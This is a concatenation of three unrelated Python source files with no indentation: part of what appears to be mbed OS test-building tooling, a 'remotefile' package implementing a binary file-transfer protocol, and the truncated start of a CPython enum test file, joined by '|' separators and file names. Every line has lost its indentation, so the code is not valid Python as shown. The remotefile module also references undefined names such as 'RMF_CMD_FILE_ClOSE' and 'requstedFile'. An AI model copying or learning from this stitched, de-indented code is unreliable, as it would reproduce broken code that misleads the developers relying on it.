def log_print(self, log_entry, timestamp=True):
""" Prints on screen formatted log entry
"""
ts = log_entry['log_timestamp']
timestamp_str = datetime.datetime.fromtimestamp(ts).strftime("[%s] "% self.TIMESTAMP_FORMAT) if timestamp else ''
log_line_str = "%(log_type)s: %(log_line)s"% (log_entry)
return timestamp_str + log_line_str
def log_line(self, LogType, log_line, timestamp=True, line_delim='\n'):
""" Logs line, if log file output was specified log line will be appended
at the end of log file
"""
log_entry = TestLogger.log_line(self, LogType, log_line)
log_line_str = self.log_print(log_entry, timestamp)
if self.log_file_name is not None:
try:
with open(self.log_file_name, 'a') as f:
f.write(log_line_str + line_delim)
except IOError:
pass
return log_line_str
def get_module_avail(module_name):
""" This function returns True if module_name is already imported module
"""
return module_name in sys.modules.keys()
def get_autodetected_MUTS_list(platform_name_filter=None):
oldError = None
if os.name == 'nt':
# Disable Windows error box temporarily
oldError = ctypes.windll.kernel32.SetErrorMode(1) #note that SEM_FAILCRITICALERRORS = 1
mbeds = mbed_lstools.create()
detect_muts_list = mbeds.list_mbeds()
if os.name == 'nt':
ctypes.windll.kernel32.SetErrorMode(oldError)
return get_autodetected_MUTS(detect_muts_list, platform_name_filter=platform_name_filter)
def get_autodetected_MUTS(mbeds_list, platform_name_filter=None):
""" Function detects all connected to host mbed-enabled devices and generates artificial MUTS file.
If function fails to auto-detect devices it will return empty dictionary.
if get_module_avail('mbed_lstools'):
mbeds = mbed_lstools.create()
mbeds_list = mbeds.list_mbeds()
@param mbeds_list list of mbeds captured from mbed_lstools
@param platform_name You can filter 'platform_name' with list of filtered targets from 'platform_name_filter'
"""
result = {} # Should be in muts_all.json format
# Align mbeds_list from mbed_lstools to MUT file format (JSON dictionary with muts)
# mbeds_list = [{'platform_name': 'NUCLEO_F302R8', 'mount_point': 'E:', 'target_id': '07050200623B61125D5EF72A', 'serial_port': u'COM34'}]
index = 1
for mut in mbeds_list:
# Filter the MUTS if a filter is specified
if platform_name_filter and not mut['platform_name'] in platform_name_filter:
continue
# For mcu_unique - we are assigning 'platform_name_unique' value from mbedls output (if its existing)
# if not we are creating our own unique value (last few chars from platform's target_id).
m = {'mcu': mut['platform_name'],
'mcu_unique' : mut['platform_name_unique'] if 'platform_name_unique' in mut else "%s[%s]" % (mut['platform_name'], mut['target_id'][-4:]),
'port': mut['serial_port'],
'disk': mut['mount_point'],
'peripherals': [] # No peripheral detection
}
if index not in result:
result[index] = {}
result[index] = m
index += 1
return result
def get_autodetected_TEST_SPEC(mbeds_list,
use_default_toolchain=True,
use_supported_toolchains=False,
toolchain_filter=None,
platform_name_filter=None):
""" Function detects all connected to host mbed-enabled devices and generates artificial test_spec file.
If function fails to auto-detect devices it will return empty 'targets' test_spec description.
use_default_toolchain - if True add default toolchain to test_spec
use_supported_toolchains - if True add all supported toolchains to test_spec
toolchain_filter - if [...list of toolchains...] add from all toolchains only those in filter to test_spec
"""
result = {'targets': {} }
for mut in mbeds_list:
mcu = mut['mcu']
if platform_name_filter is None or (platform_name_filter and mut['mcu'] in platform_name_filter):
if mcu in TARGET_MAP:
default_toolchain = TARGET_MAP[mcu].default_toolchain
supported_toolchains = TARGET_MAP[mcu].supported_toolchains
# Decide which toolchains should be added to test specification toolchain pool for each target
toolchains = []
if use_default_toolchain:
toolchains.append(default_toolchain)
if use_supported_toolchains:
toolchains += supported_toolchains
if toolchain_filter is not None:
all_toolchains = supported_toolchains + [default_toolchain]
for toolchain in toolchain_filter:
if toolchain in all_toolchains:
toolchains.append(toolchain)
result['targets'][mcu] = list(set(toolchains))
return result
def get_default_test_options_parser():
""" Get common test script options used by CLI, web services etc.
"""
parser = argparse.ArgumentParser()
parser.add_argument('-i', '--tests',
dest='test_spec_filename',
metavar="FILE",
type=argparse_filestring_type,
help='Points to file with test specification')
parser.add_argument('-M', '--MUTS',
dest='muts_spec_filename',
metavar="FILE",
type=argparse_filestring_type,
help='Points to file with MUTs specification (overwrites settings.py and private_settings.py)')
parser.add_argument("-j", "--jobs",
dest='jobs',
metavar="NUMBER",
type=int,
help="Define number of compilation jobs. Default value is 1")
if get_module_avail('mbed_lstools'):
# Additional features available when mbed_lstools is installed on host and imported
# mbed_lstools allow users to detect connected to host mbed-enabled devices
parser.add_argument('--auto',
dest='auto_detect',
action="store_true",
help='Use mbed-ls module to detect all connected mbed devices')
toolchain_list = list(TOOLCHAINS) + ["DEFAULT", "ALL"]
parser.add_argument('--tc',
dest='toolchains_filter',
type=argparse_many(argparse_uppercase_type(toolchain_list, "toolchains")),
help="Toolchain filter for --auto argument. Use toolchains names separated by comma, 'default' or 'all' to select toolchains")
test_scopes = ','.join(["'%s'" % n for n in get_available_oper_test_scopes()])
parser.add_argument('--oper',
dest='operability_checks',
type=argparse_lowercase_type(get_available_oper_test_scopes(), "scopes"),
help='Perform interoperability tests between host and connected mbed devices. Available test scopes are: %s' % test_scopes)
parser.add_argument('--clean',
dest='clean',
action="store_true",
help='Clean the build directory')
parser.add_argument('-P', '--only-peripherals',
dest='test_only_peripheral',
default=False,
action="store_true",
help='Test only peripheral declared for MUT and skip common tests')
parser.add_argument("--profile", dest="profile", action="append",
type=argparse_filestring_type,
default=[])
parser.add_argument('-C', '--only-commons',
dest='test_only_common',
default=False,
action="store_true",
help='Test only board internals. Skip perpherials tests and perform common tests')
parser.add_argument('-n', '--test-by-names',
dest='test_by_names',
type=argparse_many(str),
help='Runs only test enumerated it this switch. Use comma to separate test case names')
parser.add_argument('-p', '--peripheral-by-names',
dest='peripheral_by_names',
type=argparse_many(str),
help='Forces discovery of particular peripherals. Use comma to separate peripheral names')
copy_methods = host_tests_plugins.get_plugin_caps('CopyMethod')
copy_methods_str = "Plugin support: " + ', '.join(copy_methods)
parser.add_argument('-c', '--copy-method',
dest='copy_method',
type=argparse_uppercase_type(copy_methods, "flash method"),
help="Select binary copy (flash) method. Default is Python's shutil.copy() method. %s"% copy_methods_str)
reset_methods = host_tests_plugins.get_plugin_caps('ResetMethod')
reset_methods_str = "Plugin support: " + ', '.join(reset_methods)
parser.add_argument('-r', '--reset-type',
dest='mut_reset_type',
default=None,
type=argparse_uppercase_type(reset_methods, "reset method"),
help='Extra reset method used to reset MUT by host test script. %s'% reset_methods_str)
parser.add_argument('-g', '--goanna-for-tests',
dest='goanna_for_tests',
action="store_true",
help='Run Goanna static analyse tool for tests. (Project will be rebuilded)')
parser.add_argument('-G', '--goanna-for-sdk',
dest='goanna_for_mbed_sdk',
action="store_true",
help='Run Goanna static analyse tool for mbed SDK (Project will be rebuilded)')
parser.add_argument('-s', '--suppress-summary',
dest='suppress_summary',
default=False,
action="store_true",
help='Suppresses display of wellformatted table with test results')
parser.add_argument('-t', '--test-summary',
dest='test_x_toolchain_summary',
default=False,
action="store_true",
help='Displays wellformatted table with test x toolchain test result per target')
parser.add_argument('-A', '--test-automation-report',
dest='test_automation_report',
default=False,
action="store_true",
help='Prints information about all tests and exits')
parser.add_argument('-R', '--test-case-report',
dest='test_case_report',
default=False,
action="store_true",
help='Prints information about all test cases and exits')
parser.add_argument("-S", "--supported-toolchains",
action="store_true",
dest="supported_toolchains",
default=False,
help="Displays supported matrix of MCUs and toolchains")
parser.add_argument("-O", "--only-build",
action="store_true",
dest="only_build_tests",
default=False,
help="Only build tests, skips actual test procedures (flashing etc.)")
parser.add_argument('--parallel',
dest='parallel_test_exec',
default=False,
action="store_true",
help='Experimental, you execute test runners for connected to your host MUTs in parallel (speeds up test result collection)')
parser.add_argument('--config',
dest='verbose_test_configuration_only',
default=False,
action="store_true",
help='Displays full test specification and MUTs configration and exits')
parser.add_argument('--loops',
dest='test_loops_list',
type=argparse_many(str),
help='Set no. of loops per test. Format: TEST_1=1,TEST_2=2,TEST_3=3')
parser.add_argument('--global-loops',
dest='test_global_loops_value',
type=int,
help='Set global number of test loops per test. Default value is set 1')
parser.add_argument('--consolidate-waterfall',
dest='consolidate_waterfall_test',
default=False,
action="store_true",
help='Used with --waterfall argument. Adds only one test to report reflecting outcome of waterfall test.')
parser.add_argument('-W', '--waterfall',
dest='waterfall_test',
default=False,
action="store_true",
help='Used with --loops or --global-loops arguments. Tests until OK result occurs and assumes test passed')
parser.add_argument('-N', '--firmware-name',
dest='firmware_global_name',
help='Set global name for all produced projects. Note, proper file extension will be added by buid scripts')
parser.add_argument('-u', '--shuffle',
dest='shuffle_test_order',
default=False,
action="store_true",
help='Shuffles test execution order')
parser.add_argument('--shuffle-seed',
dest='shuffle_test_seed',
default=None,
help='Shuffle seed (If you want to reproduce your shuffle order please use seed provided in test summary)')
parser.add_argument('-f', '--filter',
dest='general_filter_regex',
type=argparse_many(str),
default=None,
help='For some commands you can use filter to filter out results')
parser.add_argument('--inc-timeout',
dest='extend_test_timeout',
metavar="NUMBER",
type=int,
help='You can increase global timeout for each test by specifying additional test timeout in seconds')
parser.add_argument('-l', '--log',
dest='log_file_name',
help='Log events to external file (note not all console entries may be visible in log file)')
parser.add_argument('--report-html',
dest='report_html_file_name',
help='You can log test suite results in form of HTML report')
parser.add_argument('--report-junit',
dest='report_junit_file_name',
help='You can log test suite results in form of JUnit compliant XML report')
parser.add_argument("--report-build",
dest="report_build_file_name",
help="Output the build results to a junit xml file")
parser.add_argument("--report-text",
dest="report_text_file_name",
help="Output the build results to a text file")
parser.add_argument('--verbose-skipped',
dest='verbose_skipped_tests',
default=False,
action="store_true",
help='Prints some extra information about skipped tests')
parser.add_argument('-V', '--verbose-test-result',
dest='verbose_test_result_only',
default=False,
action="store_true",
help='Prints test serial output')
parser.add_argument('-v', '--verbose',
dest='verbose',
default=False,
action="store_true",
help='Verbose mode (prints some extra information)')
parser.add_argument('--version',
dest='version',
default=False,
action="store_true",
help='Prints script version and exits')
parser.add_argument('--stats-depth',
dest='stats_depth',
default=2,
type=int,
help="Depth level for static memory report")
return parser
def test_path_to_name(path, base):
"""Change all slashes in a path into hyphens
This creates a unique cross-platform test name based on the path
This can eventually be overriden by a to-be-determined meta-data mechanism"""
name_parts = []
head, tail = os.path.split(relpath(path,base))
while (tail and tail != "."):
name_parts.insert(0, tail)
head, tail = os.path.split(head)
return "-".join(name_parts).lower()
def get_test_config(config_name, target_name):
"""Finds the path to a test configuration file
config_name: path to a custom configuration file OR mbed OS interface "ethernet, wifi_odin, etc"
target_name: name of target to determing if mbed OS interface given is valid
returns path to config, will return None if no valid config is found
"""
# If they passed in a full path
if exists(config_name):
# This is a module config
return config_name
# Otherwise find the path to configuration file based on mbed OS interface
return TestConfig.get_config_path(config_name, target_name)
def find_tests(base_dir, target_name, toolchain_name, icetea, greentea, app_config=None):
""" Finds all tests in a directory recursively
:param base_dir: path to the directory to scan for tests (ex. 'path/to/project')
:param target_name: name of the target to use for scanning (ex. 'K64F')
:param toolchain_name: name of the toolchain to use for scanning (ex. 'GCC_ARM')
:param icetea: icetea enabled
:param greentea: greentea enabled
:param app_config - location of a chosen mbed_app.json file
returns a dictionary where keys are the test name, and the values are
lists of paths needed to biuld the test.
"""
# Temporary structure: tests referenced by (name, base, group, case) tuple
tests = {}
# List of common folders: (predicate function, path) tuple
commons = []
config = Config(target_name, base_dir, app_config)
# Scan the directory for paths to probe for 'TESTS' folders
base_resources = Resources(MockNotifier(), collect_ignores=True)
base_resources.scan_with_config(base_dir, config)
if greentea:
dirs = [d for d in base_resources.ignored_dirs if basename(d) == 'TESTS']
ignoreset = MbedIgnoreSet()
for directory in dirs:
ignorefile = join(directory, IGNORE_FILENAME)
if isfile(ignorefile):
ignoreset.add_mbedignore(directory, ignorefile)
for test_group_directory in os.listdir(directory):
grp_dir = join(directory, test_group_directory)
if not isdir(grp_dir) or ignoreset.is_ignored(grp_dir):
continue
grpignorefile = join(grp_dir, IGNORE_FILENAME)
if isfile(grpignorefile):
ignoreset.add_mbedignore(grp_dir, grpignorefile)
for test_case_directory in os.listdir(grp_dir):
d = join(directory, test_group_directory, test_case_directory)
if not isdir(d) or ignoreset.is_ignored(d):
continue
special_dirs = ['host_tests', 'COMMON']
if test_group_directory not in special_dirs and test_case_directory not in special_dirs:
test_name = test_path_to_name(d, base_dir)
tests[(test_name, directory, test_group_directory, test_case_directory)] = [d]
if test_case_directory == 'COMMON':
def predicate(base_pred, group_pred, name_base_group_case):
(name, base, group, case) = name_base_group_case
return base == base_pred and group == group_pred
commons.append((functools.partial(predicate, directory, test_group_directory), d))
if test_group_directory == 'COMMON':
def predicate(base_pred, name_base_group_case):
(name, base, group, case) = name_base_group_case
return base == base_pred
commons.append((functools.partial(predicate, directory), grp_dir))
if icetea:
dirs = [d for d in base_resources.ignored_dirs if basename(d) == 'TEST_APPS']
for directory in dirs:
if not isdir(directory):
continue
for subdir in os.listdir(directory):
d = join(directory, subdir)
if not isdir(d):
continue
if 'device' == subdir:
for test_dir in os.listdir(d):
test_dir_path = join(d, test_dir)
test_name = test_path_to_name(test_dir_path, base_dir)
tests[(test_name, directory, subdir, test_dir)] = [test_dir_path]
# Apply common directories
for pred, path in commons:
for test_identity, test_paths in six.iteritems(tests):
if pred(test_identity):
test_paths.append(path)
# Drop identity besides name
return {name: paths for (name, _, _, _), paths in six.iteritems(tests)}
def print_tests(tests, format="list", sort=True):
"""Given a dictionary of tests (as returned from "find_tests"), print them
in the specified format"""
if format == "list":
for test_name in sorted(tests.keys()):
test_path = tests[test_name][0]
print("Test Case:")
print(" Name: %s" % test_name)
print(" Path: %s" % test_path)
elif format == "json":
print(json.dumps({test_name: test_path[0] for test_name, test_paths
in tests}, indent=2))
else:
print("Unknown format '%s'" % format)
sys.exit(1)
def norm_relative_path(path, start):
"""This function will create a normalized, relative path. It mimics the
python os.path.relpath function, but also normalizes a Windows-syle path
that use backslashes to a Unix style path that uses forward slashes."""
path = os.path.normpath(path)
path = os.path.relpath(path, start)
path = path.replace("\\", "/")
return path
def build_test_worker(*args, **kwargs):
"""This is a worker function for the parallel building of tests. The `args`
and `kwargs` are passed directly to `build_project`. It returns a dictionary
with the following structure:
{
'result': `True` if no exceptions were thrown, `False` otherwise
'reason': Instance of exception that was thrown on failure
'bin_file': Path to the created binary if `build_project` was
successful. Not present otherwise
'kwargs': The keyword arguments that were passed to `build_project`.
This includes arguments that were modified (ex. report)
}
"""
ret = {
'result': False,
'args': args,
'kwargs': kwargs
}
# Use parent TOOLCHAIN_PATHS variable
for key, value in kwargs['toolchain_paths'].items():
TOOLCHAIN_PATHS[key] = value
del kwargs['toolchain_paths']
try:
bin_file, _ = build_project(*args, **kwargs)
ret['result'] = True
ret['bin_file'] = bin_file
ret['kwargs'] = kwargs
except NotSupportedException as e:
ret['reason'] = e
except ToolException as e:
ret['reason'] = e
except KeyboardInterrupt as e:
ret['reason'] = e
except:
# Print unhandled exceptions here
import traceback
traceback.print_exc(file=sys.stdout)
return ret
def build_tests(tests, base_source_paths, build_path, target, toolchain_name,
clean=False, notify=None, jobs=1, macros=None,
silent=False, report=None, properties=None,
continue_on_build_fail=False, app_config=None,
build_profile=None, stats_depth=None, ignore=None,
resource_filter=None):
"""Given the data structure from 'find_tests' and the typical build parameters,
build all the tests
Returns a tuple of the build result (True or False) followed by the test
build data structure"""
execution_directory = "."
base_path = norm_relative_path(build_path, execution_directory)
if isinstance(target, Target):
target_name = target.name
else:
target_name = target
target = TARGET_MAP[target_name]
cfg, _, _, _ = get_config(base_source_paths, target, app_config=app_config)
baud_rate = 9600
if 'platform.stdio-baud-rate' in cfg:
baud_rate = cfg['platform.stdio-baud-rate'].value
test_build = {
"platform": target_name,
"toolchain": toolchain_name,
"base_path": base_path,
"baud_rate": baud_rate,
"binary_type": "bootable",
"tests": {},
"test_apps": {}
}
jobs_count = int(jobs if jobs else cpu_count())
p = Pool(processes=jobs_count)
results = []
for test_name, test_paths in tests.items():
if not isinstance(test_paths, list):
test_paths = [test_paths]
test_build_path = os.path.join(build_path, test_paths[0])
src_paths = base_source_paths + test_paths
test_case_folder_name = os.path.basename(test_paths[0])
args = (src_paths, test_build_path, deepcopy(target), toolchain_name)
kwargs = {
'jobs': 1,
'clean': clean,
'macros': macros,
'name': test_case_folder_name,
'project_id': test_name,
'report': report,
'properties': properties,
'app_config': app_config,
'build_profile': build_profile,
'toolchain_paths': TOOLCHAIN_PATHS,
'stats_depth': stats_depth,
'notify': MockNotifier(),
'resource_filter': resource_filter
}
results.append(p.apply_async(build_test_worker, args, kwargs))
p.close()
result = True
itr = 0
while len(results):
itr += 1
if itr > 360000:
p.terminate()
p.join()
raise ToolException("Compile did not finish in 10 minutes")
else:
sleep(0.01)
pending = 0
for r in results:
if r.ready() is True:
try:
worker_result = r.get()
results.remove(r)
# Push all deferred notifications out to the actual notifier
new_notify = deepcopy(notify)
for message in worker_result['kwargs']['notify'].messages:
new_notify.notify(message)
# Take report from the kwargs and merge it into existing report
if report:
report_entry = worker_result['kwargs']['report'][target_name][toolchain_name]
report_entry[worker_result['kwargs']['project_id'].upper()][0][0]['output'] = new_notify.get_output()
for test_key in report_entry.keys():
report[target_name][toolchain_name][test_key] = report_entry[test_key]
# Set the overall result to a failure if a build failure occurred
if ('reason' in worker_result and
not worker_result['reason'] and
not isinstance(worker_result['reason'], NotSupportedException)):
result = False
break
# Adding binary path to test build result
if ('result' in worker_result and
worker_result['result'] and
'bin_file' in worker_result):
bin_file = norm_relative_path(worker_result['bin_file'], execution_directory)
test_key = 'test_apps' if 'test_apps-' in worker_result['kwargs']['project_id'] else 'tests'
test_build[test_key][worker_result['kwargs']['project_id']] = {
"binaries": [
{
"path": bin_file
}
]
}
test_key = worker_result['kwargs']['project_id'].upper()
print('Image: %s\n' % bin_file)
except:
if p._taskqueue.queue:
p._taskqueue.queue.clear()
sleep(0.5)
p.terminate()
p.join()
raise
else:
pending += 1
if pending >= jobs_count:
break
# Break as soon as possible if there is a failure and we are not
# continuing on build failures
if not result and not continue_on_build_fail:
if p._taskqueue.queue:
p._taskqueue.queue.clear()
sleep(0.5)
p.terminate()
break
p.join()
test_builds = {}
test_builds["%s-%s" % (target_name, toolchain_name)] = test_build
return result, test_builds
def test_spec_from_test_builds(test_builds):
for build in test_builds:
# Convert TZ target name to test spec platform name
#
# 1. All TZ targets should have name pattern: PLATFORM_[NPSA_]S/NS, where:
# (1) 'PLATFORM' for test spec platform name
# (2) 'NPSA' for non-PSA targets. Defaults to PSA target if absent.
# (3) 'S'/'NS' for secure/non-secure targets
# 2. Secure target may participate in Greentea, so its name is also truncated here.
if Target.get_target(test_builds[build]['platform']).is_TrustZone_target:
if test_builds[build]['platform'].endswith('_NS'):
test_builds[build]['platform'] = test_builds[build]['platform'][:-3]
elif test_builds[build]['platform'].endswith('_S'):
test_builds[build]['platform'] = test_builds[build]['platform'][:-2]
if test_builds[build]['platform'].endswith('_NPSA'):
test_builds[build]['platform'] = test_builds[build]['platform'][:-5]
return {
"builds": test_builds
}
|
__init__.py
|
import sys
import struct
import abc
import queue
import threading
#constants
RMF_CMD_START_ADDR = 0x3FFFFC00
RMF_FILE_TYPE_FIXED = 0
RMF_FILE_TYPE_DYNAMIC = 1
RMF_FILE_TYPE_STREAM = 2
RMF_CMD_ACK = 0 #reserved for future use
RMF_CMD_NACK = 1 #reserved for future use
RMF_CMD_EOT = 2 #reserved for future use
RMF_CMD_FILE_INFO = 3
RMF_CMD_FILE_OPEN = 10
RMF_CMD_FILE_CLOSE = 11
RMF_DIGEST_TYPE_NONE = 0
RMF_MSG_CONNECT = 0
RMF_MSG_FILEINFO = 1
RMF_MSG_FILEOPEN = 2
RMF_MSG_FILECLOSE = 3
RMF_MSG_WRITE_DATA = 4
RMF_FILEINFO_BASE_LEN = 48
def unpackHeader(data):
"""
Returns tuple (bytes_parsed, address, more_bit)
"""
i=0
bytes_parsed=0
more_bit=False
address=None
if((i+1)<len(data)): #parse 16-bits
b1,b2=data[i:i+2];i+=2
if b1 & 0x40: more_bit=True
if b1 & 0x80:
#high_bit is set set, parse next 16 bits to form a full 30-bit address (2 bits reserved for flags)
b1&=0x3F
if (i+2)<len(data):
b3,b4=data[i:i+2];i+=2
address=(b1<<24)|(b2<<16)|(b3<<8)|b4
else:
#parse 2 or 3 bytes as header depending on mode
b1&=0x3F
address=(b1<<8)|(b2)
if address is not None:
bytes_parsed = i
return (bytes_parsed,address,more_bit)
def packHeader(address, more_bit=False):
"""
packs address and more_bit into bytearray
returns bytes
"""
if address<16384:
#address will fit into 16 bits
b1,b2=(address>>8)&0x3F,address&0xFF
if more_bit: b1|=0x40
return bytes([b1,b2])
elif address <1073741824:
b1,b2,b3,b4=(address>>24)&0x3F,(address>>16)&0xFF,(address>>8)&0xFF,address&0xFF
if more_bit: b1|=0x40
return bytes([b1|0x80,b2,b3,b4])
else:
raise ValueError('address must be less than 1073741824')
def packFileInfo(file, byte_order='<'):
"""
packs FileInfo object into bytearray b
"""
if file.address is None:
raise ValueError('FileInfo object does not have an address')
if (byte_order != '<') and (byte_order != '>'):
raise ValueError('unknown byte_order: '+str(byte_order))
fmt='%s3I2H32s%ds'%(byte_order,len(file.name))
return struct.pack(fmt, RMF_CMD_FILE_INFO, file.address, file.length, file.fileType, file.digestType,
file.digestData,bytes(file.name,encoding='ascii'))
def unpackFileInfo(data, byte_order='<'):
"""
unpacks FileInfo object from bytearray b
"""
if (byte_order != '<') and (byte_order != '>'):
raise ValueError('unknown byte_order: '+str(byte_order))
fmt='%s3I2H32s'%(byte_order)
assert(RMF_FILEINFO_BASE_LEN == RMF_FILEINFO_BASE_LEN)
if len(data)>=RMF_FILEINFO_BASE_LEN:
part1=data[0:RMF_FILEINFO_BASE_LEN]
part2=data[RMF_FILEINFO_BASE_LEN:]
(cmdType, address, length, fileType, digestType, digestData) = struct.unpack(fmt,part1)
endOffset=None
for i in range(0,len(part2)):
if part2[i]==0:
endOffset=i
break
if endOffset is not None:
name = str(part2[0:endOffset],encoding='utf-8')
else:
name = str(part2[0:],encoding='utf-8')
file = File(name, length, fileType, address)
file.digestType=digestType
file.digestData=digestData
return file
else:
return None
def packFileOpen(address, byte_order='<'):
if (byte_order != '<') and (byte_order != '>'):
raise ValueError('unknown byte_order: '+str(byte_order))
fmt='%s2I'%(byte_order)
return struct.pack(fmt, RMF_CMD_FILE_OPEN, address)
def unpackFileOpen(data, byte_order='<'):
if (byte_order != '<') and (byte_order != '>'):
raise ValueError('unknown byte_order: '+str(byte_order))
fmt='%s2I'%(byte_order)
cmdType,address = struct.unpack(fmt, data)
if cmdType != RMF_CMD_FILE_OPEN:
raise ValueError('expected RMF_CMD_FILE_OPEN')
return address
def packFileClose(address, byte_order='<'):
if (byte_order != '<') and (byte_order != '>'):
raise ValueError('unknown byte_order: '+str(byte_order))
fmt='%s2I'%(byte_order)
return struct.pack(fmt, RMF_CMD_FILE_CLOSE, address)
def unpackFileClose(data, byte_order='<'):
if (byte_order != '<') and (byte_order != '>'):
raise ValueError('unknown byte_order: '+str(byte_order))
fmt='%s2I'%(byte_order)
cmdType,address = struct.unpack(fmt, data)
if cmdType != RMF_CMD_FILE_ClOSE:
raise ValueError('expected RMF_CMD_FILE_ClOSE')
return address
class TransmitHandler(metaclass=abc.ABCMeta):
def getSendAvail(self,): return None
@abc.abstractmethod
def send(self, data : bytes):
"""
send data bytes
"""
class ReceiveHandler(metaclass=abc.ABCMeta):
@abc.abstractmethod
def onMsgReceived(self, msg):
"""
called by socket adapter when a message has been received
"""
@abc.abstractmethod
def onConnected(self, transmitHandler):
"""
called by socket adapter on a new connection, a reference to self (the socket adapter) is given as the argument
"""
class File:
"""
Base class for File. This can be inherited from in case you need more properties (e.g. APX).
Note: in C implemenation this class is called FileInfo_t
"""
def __init__(self, name, length, fileType=RMF_FILE_TYPE_FIXED, address=None):
self.name = str(name) #part of FILEINFO struct
self.length = int(length) #part of FILEINFO struct
self.fileType = int(fileType) #part of FILEINFO struct
self.address = address #part of FILEINFO struct
self.digestType = RMF_DIGEST_TYPE_NONE #part of FILEINFO struct
self.digestData = bytes([0]*32) #part of FILEINFO struct
self.isRemoteFile=False #not part of FILEINFO struct
self.isOpen=False #not part of FILEINFO struct
def open(self):
self.isOpen=True
def close(self):
self.isOpen=False
class FileMap(metaclass=abc.ABCMeta):
"""
abstract baseclass of FileMap
FileMaps are used by the FileManager class.
It is expected that files in the FileMap are sorted by address (in ascending order)
"""
@abc.abstractmethod
def insert(self, file):
"""
inserts file into the FileMap. The FileMap must assign an address to the file when inserted
"""
@abc.abstractmethod
def remove(self, file):
"""
removes file from FileMap.
"""
@ReceiveHandler.register
class FileManager:
"""
The FileManager manages local and remote files mapped to a point-to-point connection
"""
def __init__(self, localFileMap, remoteFileMap):
assert(isinstance(localFileMap, FileMap))
assert(isinstance(remoteFileMap, FileMap))
self.localFileMap = localFileMap
self.remoteFileMap = remoteFileMap
self.requestedFiles = {}
self.byteOrder='<' #use '<' for little endian, '>' for big endian
def worker():
"""
this is the worker thread.
It awaits commands in the message queue q. When the special message None arrives it quits
"""
transmitHandler=None
while True:
msg = self.msgQueue.get()
if msg is None:
break
msgType=msg[0]
if msgType == RMF_MSG_CONNECT:
transmitHandler=msg[1]
elif msgType == RMF_MSG_FILEINFO:
fileInfo=msg[1]
header = packHeader(RMF_CMD_START_ADDR)
if transmitHandler is not None:
transmitHandler.send(header+fileInfo)
elif msgType == RMF_MSG_WRITE_DATA:
(address,data)=msg[1:3]
header = packHeader(address)
if transmitHandler is not None:
transmitHandler.send(header+data)
elif msgType == RMF_MSG_FILEOPEN:
data = packFileOpen(msg[1])
header = packHeader(RMF_CMD_START_ADDR)
if transmitHandler is not None:
transmitHandler.send(header+data)
else:
raise NotImplementedError(msgType)
self.msgQueue = queue.Queue()
self.worker_active=False
self.worker = threading.Thread(target=worker)
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
self.stop()
def start(self):
self.worker_active=True
self.worker.start()
def stop(self):
if self.worker_active:
#send special message None to stop the worker thread
self.msgQueue.put(None)
self.worker.join()
self.worker=None
self.worker_active=False
def _FileInfo_handler(self, msg):
print("_FileInfo_handler")
def attachLocalFile(self, file):
self.localFileMap.insert(file)
file.fileManager=self
def requestRemoteFile(self, file):
self.requestedFiles[file.name]=file
#ReceiveHandler API
def onMsgReceived(self, msg):
bytes_parsed,address,more_bit = unpackHeader(msg)
if bytes_parsed>0:
if address==RMF_CMD_START_ADDR:
self._processCmd(msg[bytes_parsed:])
elif address<RMF_CMD_START_ADDR:
self._processFileWrite(address, more_bit, msg[bytes_parsed:])
else:
raise ValueError("invalid address %d"%address)
def onConnected(self, transmitHandler):
"""
called on new connection
"""
print("FileManager.onConnected")
self.msgQueue.put((RMF_MSG_CONNECT,transmitHandler))
for file in self.localFileMap:
self.msgQueue.put((RMF_MSG_FILEINFO,packFileInfo(file)))
def _processCmd(self, data):
fmt = self.byteOrder+'I'
size=struct.calcsize(fmt)
if len(data)>=size:
(cmd,) = struct.unpack(fmt,data[0:size])
if cmd==RMF_CMD_FILE_INFO:
remoteFile = unpackFileInfo(data, self.byteOrder)
#check if this is a requested file
if remoteFile.name in self.requestedFiles:
requestedFile = self.requestedFiles[remoteFile.name]
if requestedFile.length == remoteFile.length:
del self.requestedFiles[requestedFile.name]
requestedFile.address=remoteFile.address
requestedFile.fileType=remoteFile.fileType
requestedFile.digestType=remoteFile.digestType
requestedFile.digestData=remoteFile.digestData
requestedFile.open()
self.remoteFileMap.insert(requestedFile)
print("sending request to open file %s"%requestedFile.name)
msg=(RMF_MSG_FILEOPEN, requestedFile.address)
self.msgQueue.put(msg)
else:
print("[remoteFile.FileManager] FileInfo received for %s but with length=%d, expected length=%d"%(requstedFile.name, remoteFile.length, requstedFile.length))
else:
self.remoteFileMap.insert(remoteFile)
elif cmd==RMF_CMD_FILE_OPEN:
address = unpackFileOpen(data, self.byteOrder)
file = self.localFileMap.findByAddress(address)
if file is not None:
print("FileManager.open(%s)"%file.name)
file.open()
fileContent = file.read(0,file.length)
if fileContent is not None:
msg=(RMF_MSG_WRITE_DATA,file.address, fileContent)
self.msgQueue.put(msg)
elif cmd==RMF_CMD_FILE_CLOSE:
address = unpackFileClose(data, self.byteOrder)
file = self.localFileMap.findByAddress(address)
if file is not None:
print("FileManager.close(%s)"%file.name)
file.close()
else:
print("[remotefile] unknown command %d"%cmd,file=sys.stderr)
def _processFileWrite(self, address, more_bit, data):
remoteFile = self.remoteFileMap.findByAddress(address)
if remoteFile is not None and remoteFile.isOpen == True:
offset = address-remoteFile.address
if (offset>=0) and (offset+len(data)<=remoteFile.length):
remoteFile.write(offset, data, more_bit)
def outPortDataWriteNotify(self, file: File, offset : int, length : int):
assert(file.address is not None)
fileContent=file.read(offset, length)
if fileContent is not None:
msg=(RMF_MSG_WRITE_DATA,file.address+offset, fileContent)
self.msgQueue.put(msg)
from remotefile.socket_adapter import TcpSocketAdapter
from remotefile.proto import readLine
|
test_enum.py
|
import enum
import inspect
import pydoc
import sys
import unittest
import threading
from collections import OrderedDict
from enum import Enum, IntEnum, StrEnum, EnumMeta, Flag, IntFlag, unique, auto
from io import StringIO
from pickle import dumps, loads, PicklingError, HIGHEST_PROTOCOL
from test import support
from test.support import ALWAYS_EQ
from test.support import threading_helper
from datetime import timedelta
# for pickle tests
try:
class Stooges(Enum):
LARRY = 1
CURLY = 2
MOE = 3
except Exception as exc:
Stooges = exc
try:
class IntStooges(int, Enum):
LARRY = 1
CURLY = 2
MOE = 3
except Exception as exc:
IntStooges = exc
try:
class FloatStooges(float, Enum):
LARRY = 1.39
CURLY = 2.72
MOE = 3.142596
except Exception as exc:
FloatStooges = exc
try:
class FlagStooges(Flag):
LARRY = 1
CURLY = 2
MOE = 3
except Exception as exc:
FlagStooges = exc
# for pickle test and subclass tests
class Name(StrEnum):
BDFL = 'Guido van Rossum'
FLUFL = 'Barry Warsaw'
try:
Question = Enum('Question', 'who what when where why', module=__name__)
